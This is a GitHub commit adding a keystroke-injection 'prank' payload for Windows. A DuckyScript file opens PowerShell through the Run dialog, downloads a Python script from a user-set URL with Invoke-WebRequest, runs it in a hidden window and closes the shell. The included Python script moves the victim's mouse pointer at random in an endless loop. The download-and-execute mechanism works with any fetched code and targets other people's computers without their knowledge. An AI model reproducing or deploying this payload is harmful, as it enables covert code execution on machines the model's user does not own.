Merge pull request #168 from aleff-github/patch-35

The Mouse Moves By Itself
pull/178/head
Kalani Helekunihi 2023-06-12 14:08:09 -04:00 committed by GitHub
commit a4f07abc94
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 63 additions and 0 deletions

View File

@ -0,0 +1,21 @@
# The Mouse Moves By Itself
A script used to prank your friends with the mouse pointer.
**Category**: Prank
## Description
A script used to prank your friends with the mouse pointer.
Opens a shell, dowloand the Python script that will prank your friends mouving the mouse pointer.
## Getting Started
### Dependencies
* Internet Connection
### Settings
- Setup your Python script link in the payload.txt file

View File

@ -0,0 +1,27 @@
REM ############################################
REM # |
REM # Title : The Mouse Moves By Itself |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ############################################
REM Requirements:
REM - Internet Connection
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
DEFAULT_DELAY 500
GUI r
STRINGLN powershell
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ALT F4

View File

@ -0,0 +1,15 @@
import os
try:
import pyautogui
except:
os.system("pip install pyautogui")
import pyautogui
import random
import time
while True:
# Move the mouse cursor randomly
x_offset = random.randint(-250, 250)
y_offset = random.randint(-250, 250)
pyautogui.moveRel(x_offset, y_offset, duration=0.25)
time.sleep(0.1) # 1 second delay